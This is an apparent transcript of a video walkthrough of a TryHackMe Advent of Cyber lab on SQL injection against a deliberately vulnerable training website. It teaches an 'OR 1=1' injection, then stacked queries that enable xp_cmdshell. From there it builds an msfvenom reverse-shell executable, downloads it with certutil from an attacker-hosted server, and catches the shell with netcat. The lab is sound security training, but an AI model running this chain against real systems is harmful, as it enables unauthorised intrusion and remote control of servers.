Hello everyone, welcome to Anonymous World. Hope you're doing well. So today is day 10 of Advent of Cyber 2023. So let's get started. So day 10 is SQL injection. Inject the halls with exec queries. So the Best Festival company started receiving many reports that their company website bestfestival.thm is displaying some concerning information about the state of Christmas this year. And after looking into this particular matter, Santa Security Operations Center confirmed that the company website has been hijacked and ultimately defaced, which caused significant reputation damage as well. Okay, so to make matters worse, the web development team has been locked out of the web server as the user credentials have been changed. And with no other way to revert the changes, Elf Exploit Red has been tasked with attempting to hack back into the server to regain the access. Okay, and after doing some initial research, Forensic Blue found a forum which was posted on a black hat hacking internet forum known as Jingle Hacks. And the post made earlier in the month explains that the poster is auctioning of several active vulnerabilities related to the Best Festival company system. Okay, so someone posted on Jingle Hacks that vulnerabilities are for sale for the company Best Festival. You can see someone with name Gridster has posted that. Let's go ahead. This forum post surely explains the havoc that has gone on over the past week. Okay, as a result of Red's thorough investigation, the team now suspects a possible SQL injection vulnerability. So into this task, we will learn how to identify SQL injection vulnerabilities, exploit stacked queries to turn SQL injection into remote code execution, and finally help Red store the best festival company website and save its reputation. Okay, so deploying the virtual machine, we need to start our VM as well as a tag box. So let's do that. Okay, so it will take some time. Till then, we can go through this description. So first, it is telling about SQL. So what is SQL? SQL is a structured query language which is essential for working with relational databases and building dynamic websites. So you must have learned this before in your college or school. So even if you have never explicitly used SQL before, chances are that you have frequently interacted with the databases. Okay, whether you are checking your bank account balance online, browsing through products or an e-commerce website, posting a status on social media, you are indirectly querying and altering databases. Okay, and SQL is one of the most popular languages that make this all possible. So we will leverage an example of database table to represent the tracking and cataloging of Christmas tree ornaments. And the table and column structure might look something like this. Okay, so there are 7 columns: ornament ID, elf ID, color, category, material, date, created, price, and the values have been filled in. So we have defined the database table ornaments to store ornaments with various columns. So with this uh, example table, you can learn is basic SQL here. So what's happening in first query? Select start from table ornaments where material is equal to wood. So it is telling to select all the data from the table ornaments from this table where a material name is equal to wood. So this is wood, so it will return all this data. So now another example is select ornament ID, color and category from table ornaments for where elf ID is 102. So elf ID is 102 is here. These two have elf ID 102. So it will give its ornament ID, color and category. Okay. And using insert, you can add new data into the table. Now next is PHP, which is a popular general purpose scripting language that plays a crucial role in web development, and it enables developers to create dynamic and interactive websites by generating HTML content on the server. So it is a server-side scripting language, meaning the code is executed on the web server before the final HTML is sent. Okay. PHP allows developer to perform various server-side tasks such as connecting to a wide range of databases such as MySQL, PostgreSQL, etc., etc., and executing SQL queries, processing form data. Okay. So the very The most common way of PHP to connect to SQL database is using the PHP data objects, so known as PDO extension, or specific database servers drive like MySQLi for MySQL or SQL for Microsoft SQL Server. Okay, so this is how you connect to database using PHP. So in this snippet, the SQL query is first saved into a variable named query, and then this query instructs the database to retrieve all rows from table name where color is equal to green. Okay, so simple. We then use the SQL SRV query function to execute this query by passing it to database connection object con. And you can think result variable as a container that holds the outcome of SQL query. Okay, then next is user input. So one common way to take in user supplied data in web application is through get parameters. So these parameters are typically appended to URL and can be accessed by PHP. So here you can say there is one variable color. Then we have get parameter named color. That variable is then getting passed into the query string. You can see here. Now users can dynamically control the query being executed by the database simply by modifying the URL parameter they include in the request. Okay, so for example, if a user gives here color is equal to green or red or do anything, it will go here in the color variable, then it will get passed into the query. Select star from table on where color is equal to dollar color, which means dollar color stores the value green. Okay, so here we will be performing SQL injection. So taking in user supplied input gives us powerful way to create dynamic content, but also failing to secure this input correctly can expose a critical vulnerability, which is also known as SQL injection. And this type of vulnerability is featured prominently in the OWASP top 10 list of critical web application security risks. In 2021, it was on third position, injection attacks. Okay, let's go ahead. So without adequate security measures, an attacker could manipulate the color parameter to execute malicious queries. For instance, instead of searching for a particular single color, they might input uh, inverted comma or 1 is equal to 1 as the input parameter. So what will happen here? Let's see. So where color is equal to uh, here the user gave one inverted comma here, and one was from before because this was the syntax of the query, so it will get closed, and then it's or 1 is equal to 1, so 1 is equal to 1 is always true. Okay, so it is a simple equality check where the left and right sides are equal. Since 1 always equals 1, this condition always evaluates to true. Okay, now use of this two comment at the end of input, it is a comment symbol in SQL, so it tells the database server to ignore everything that comes after it. So ending with the comment is crucial for the attacker because it nullifies the rest of the query. So after this, in whatever value will be there or anything will be there will get ignored. So the condition color is equal to inverted commas is empty and or 1 is equal to 1 is always true. So effectively making the entire where condition true for every row in the table. So it will return all the data from there. A caution around or 1 is equal to 1. So there is a potential risk of using that. So while commonly used for illustrating, injecting without caution can lead to unintended havoc on databases. So when injecting or 1 is equal to 1 into a query, the intention is typically to bypass authentication, or we want to return all items in a table by making the condition always valid and true. So what's the risk then? Is that you might not be aware of the context and scope of the query you are injecting into. Additionally, applications may sometimes use values from an initial request in multiple SQL queries. And the injection payload that return all rows can lead to unintended consequences when injected into different type of statements such as insert, update, or delete. So one example is given here, what havoc it can create. So an or 1 is equal to 1 payload would make the condition true for every row, leading to a mass update affecting all records. So this lack of specificity in the payload makes it a risky choice for testers who might inadvertently cause significant data loss or alteration. So what's the safer example? For instance, Bob, then one inverted comma and 1 is equal to 1 would update Bob's record, while Bob and 1 is equal to 2 would not. So this still demonstrates SQL injection vulnerability without putting the entire tables recorded. Okay, then we have stacked queries. So a technique that often gives an attacker a lot of control is known as stacked query. Uh, these queries enable attackers to terminate the original query and execute additional SQL statement in a single injection, which potentially lead to more severe consequences. Okay, so in SQL, the semicolon typically signifies one statement's conclusion and other's commencement. You can use semicolon to end one statement and start the other one. Okay, let's go ahead. So suppose our attacker in previous example wants to go beyond just retrieving all rows and intends to insert also some malicious data. So the attacker can simply use semicolon to start a new SQL statement. So attacker can use insert statement, insert to add its own data. Okay, let's go ahead. Testing for SQL injection. So this is where our challenges start. So from here, visit to this IP. Let's go to our website. You should see the defaced best festival company website. Okay, let's go there. 10.10.168.118. Okay, the website is defaced. Best festival company has changed to worst grumpy company. Welcome to Santa's workshop. Our mischievous elves. Okay, so they have just defaced the website. That's not good. Mac evil. Santa's stupid workshop. Okay, we need to do something. So navigate the website as an end user to understand its functionality and offerings. Is a great place to start. Okay, so browse the website manually until you can find a form that accepts user input and might be querying a database. After locating the gift search feature, we can confirm our suspicion by simply filling out the form with the expected values. So there is one gift search feature. You can see home with the helps contact and gift search. Start my gift search. So we need to fill a form here. Okay, let's fill something. Child, we need toys, and budget is $40. Search. So based on the data given, it retrieves data from database. You can see in the URL, age is equal to child and interest is equal to twice and budget is equal to 40. So by this we can uh, confirm that this requires a user input, and we can try injecting our SQL payload here. Okay, so underlying PHP code is taking in the three parameters: age, interest, and then budget, separated by the and character. So now that we've identified an area of website where user input is accepted and used to generate dynamic SQL queries, we can test if it's vulnerable to any injection attack. To do this, we can enter the parameter to test. Okay, so a very basic way of testing this is just give an inverted comma before any value, and you can try searching for it. So let's see. So now you can see instead of values, we have one error, database query error. Okay, OBDC driver 17 for SQL Server. Okay, unclosed quotation mark after the character string. Okay, so it was expecting some string value for age, but instead it found a quotation mark, so it didn't reacted well and gave out the error. Okay, go ahead. So the error we received is a huge breakthrough as it gives us many details on the underlying database management system powering this website and confirm that the user input is unsanitized. So this error message shows that the Microsoft SQL Server is the database manager. You can see Microsoft ODBC driver 17 for SQL Server. Okay, so error message enumeration is critical to SQL injection testing because it equips attackers with valuable information for crafting more precise and effective attack payloads. So when you know that version or uh, what version server is being used, you can craft your payloads accordingly. Okay, so this is just a visualization of the gift search code, like what might be running in background. There are three variables: age, interest, budget, and they are passed in the SQL query. Okay. So now let's attempt to leverage the SQL injection payload from earlier to inject our own condition on the gift search feature that will always evaluate to true. Okay, so let's do that. So we will use that or1 is equal to 1 payload here. So first quotation mark, then or, then 1 is equal to 1, followed by comment. Okay, let's hit enter. So as you can see, it displayed all the data from the database. So this quotation mark means the value of age was just empty, and then 1 is equal to 1 is always true. So it gave out the result. So we have successfully dumped the database table and returned all 636 rows to the page. And this is a very simple example and suitable proof of concept that this website is vulnerable to SQL injection. Okay, so let's explore possible method to execute system commands via our newly found attack vector. Now we will learn about calling stored procedures. So as we saw earlier about stat queries, so stat queries can be used to call stored procedures for a function within a database management system. So you can think of stored procedure as extended functions offered by certain database systems serving various purposes, such as enhancing performance and security. And the Microsoft SQL Server is one of them. Its stored procedure xp underscore cmd shell is a specific command that allows for executing operating system calls. Okay, so we might be able to run operating system calls and obtain RCE, and with that error we did confirm that our database system is a Microsoft SQL Server. So let's go ahead. So there is about XP CMD cell. So it enables the execution of OS commands and programs from within the SQL Server, and basically it provides a mechanism for SQL Server to interact directly with host operating system command shell. Okay. Let's go. It is possible to manually enable XPCMD shell in SQL Server through execute queries or exec queries, but still it requires a database user to be a member of system admin, fix server role, or have the alter setting server level permission to execute this command. Okay, so we can attempt to enable XPCMD shell on the West Festival Community database by stacking the following commands using the SQL injection we just discovered. Okay, so we will stack up this 4 queries: show advanced option, then reconfigure, then xpcmd shell, and then reconfigure. Okay, so what's happening here? We will first enable advanced configuration option in SQL Server by setting show advanced option to 1. We then apply the change to running configuration via the reconfigure statement. Okay, so reconfigure is for changing this configuration. Now our next step will be to enable the xpcmd shell by putting the value it to 1 true and applying the change to running configure again. And we just saw that we can use semicolon to end one statement and start another SQL statement. So okay, we will use this. Just copy this. Okay, so now instead of or 1 equal to 1, we will use this. Okay, let's hit enter. For your search returned no result. So now why this happened? So by requesting the URL of this parameter, we should be able to execute the stat queries and enable the XP CMD shell procedure. Okay, but unfortunately, one of the keywords of True's approach is that it returns its result as a row of text. So what does it mean? The output will never be returned to the user since the injection no longer occurs in the original intended query. And because of this, we are often in the dark as to whether our injection worked or not. Like with this text, you can't tell if it worked or not. Sorry, your search is return no result. So now, how to fix this? So for fixing this, we will be using MSF Venom. Okay. So using MSF Venom, we will create a malicious payload, which will eventually allow us to upgrade our SQL injected shell into a more standard reverse shell. Okay. So now we need to get a reverse shell here. So MSFNM is a command line payload generation tool, and it is a part of Metasploit framework, which is used for penetration testing and ethical hacking set of utilities. So let's open our terminal, and here we will use MSFNM. Okay, MSFNM, then payload, so Windows 64-bit, and we will use reverse shell payload. So we use reverse shell reverse TCP. Okay, then we need to give here our IP address. So it's 10.10.238.238. Okay. Then we need to specify the local port output. So let's just give it 444. You can also use 1234, 5678, whatever you wish. Equal to. Okay. Then output format is exe and our file name. So reverse.exe. Hit enter. Okay. So it will take a moment to generate, but once complete, you will have created a reverse.exe Windows executable file, which will help us to establish a reverse TCP connection over port number 444. So now with our payload created, we can set up a quick HTTP server on our attack box using Python to serve the file. Okay, so let's start a Python server. Okay, so serving HTTP on port 8000. Now it's time to use our stat query to call xpcmd shell and execute the searchutil.exe command on the target to download our payload. So now what is searchutil.exe? So searchutil.exe command is a native Windows command line program installed as part of certificate services, and it's handy in engagement because it is binary signed by Microsoft, and it basically help us to allow to make HTTP connections. And we here we need to download that the reverse.exe file which we just created into the web festival server. So we'll be using searchutil.exe. So let's copy this new command. Okay, and we will hit this query. Okay, so exec xpcmd shell, then our search util url cache f http your IP address here, then your port number. So we need to give our IP address here. Okay, so our IP address is 10.10.238.238, our port number 8000, and reverse.exe. So let's enter. Let's see if it worked. Yeah, you can see a get request was made here reverse for reverse.exe. Now we have achieved remote code execution and now have our reverse shell payload on the target system. And now what we have to do is we just need to set up a listener to catch the shell and then have the system execute the payload executable. So let's open our new tab, and we will set up a listener here, nc lvnp we use port number 444. Remember the port number should be same, the payload as well as your network listener. Okay. So netcat is a versatile network utility. You must know that. So now we can run one final stack query to execute the reverse.exe file we previously saved in the temp directory. Okay. So now that we have stored our reverse exe file there, now we also need to run it. Otherwise, it won't execute and give us reverse shell. Okay. So let's execute our new query. So what's happening here? So we are using exec xpcmd shell, and then we are executing our reverse.exe, which we stored under Windows temp folder. Hit enter. This time you see it keeps loading, and when we go to our listener, we can see we have got a reverse shell. We can use who am I. You can see services MS SQL. Okay. Then we can use dir to see the directories. Okay. Let's go ahead. Now our main task is to restoring the website. So let's see if any clues might help us restoring the system. Explore the system's user directory. See users is a great place to start. So let's go there. So you can see administrator public. Okay, so there are two folders. We need to explore that. So let's head to our question. We need to explore the administrator folder here. So we will search for the subdirectories for hints or files that can guide us restoring the website. So let's start with the question. Manually navigate the defaced website to find the vulnerable search form. What is the first web page you come across that contains the gift finding feature? So it was giftsearch.php. So let's just go there again. What was the website? 168.118. So it's gift search. Start my gift search. So the page name is giftsearch.php. Giftsearch.php. Okay. Analyze the SQL error message that is returned. What OBDC driver is being used? Okay, so we need to find the OBDC driver. We saw that the error message earlier. Let's just do a search. Okay, we there was no need of doing that. So it is ODBC driver 17 for SQL Server. Copy that. Inject the 1 is equal to 1 condition into the gift search form. What is the last result returned in the database? Okay, let's see that. Or 1 equal to 1. Let's go to end of the search. Okay, so we have one flag here. Now, what flag is in the node file Gritster left behind on the system? Let's check our node file. Let's go to administrator. Dir. Okay, where can we find our nodes? So let's search on desktop. Yeah, so there is nodes.txt. We can read that using type node.txt. Okay, hey hacker 0192, I received a Bitcoin payment. So at last we can see our flag. Just copy this. Now, what is the flag you receive on the home page after restoring the website? So first we need to restore the website. Okay, so here is one file named restore website.bat. So let's just run it. restore underscore website.bat, removing all files and folders from this file and website restoration complete. Please refresh the home. Okay, let's refresh the page. Let's go to home. So we have our final flag. Okay, so that was all for today's room. If you enjoyed this class, feel free to check out the software security module. So that's all for this video. I will see you tomorrow in next video. Till then, keep learning.